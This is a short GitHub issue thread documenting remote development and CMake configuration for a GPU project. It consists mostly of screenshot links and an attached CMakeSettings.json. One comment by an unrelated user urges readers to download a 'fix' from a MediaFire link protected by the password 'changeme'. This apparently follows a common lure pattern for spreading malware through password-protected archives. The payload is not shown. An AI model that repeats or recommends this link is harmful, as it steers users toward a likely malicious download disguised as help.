### ISSUE TITLE
[DOC] dev on 192.168.30.32

### ISSUE THREAD

**Issue by kdvictor** [randbatch-md/rbmd-gpu#32]
### 1. 配置远程服务
![image](https://github.com/user-attachments/assets/7ca43e31-4ab8-4eed-b9ad-b3a14b39bd9f)
![image](https://github.com/user-attachments/assets/458d28f4-a984-4755-832c-37ccd0aff306)

### 2. 配置CMAKE，修改CMakeSetting.json
![image](https://github.com/user-attachments/assets/38b509fa-a738-4941-b78e-2e9b0b6fa098)
![image](https://github.com/user-attachments/assets/0f3604e0-2834-44fe-aafa-5253156e1abf)
![image](https://github.com/user-attachments/assets/1507bbb7-4139-4654-ae27-790fb55d7fea)

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by kdvictor** [comment]
[CMakeSettings.json](https://github.com/user-attachments/files/16759116/CMakeSettings.json)
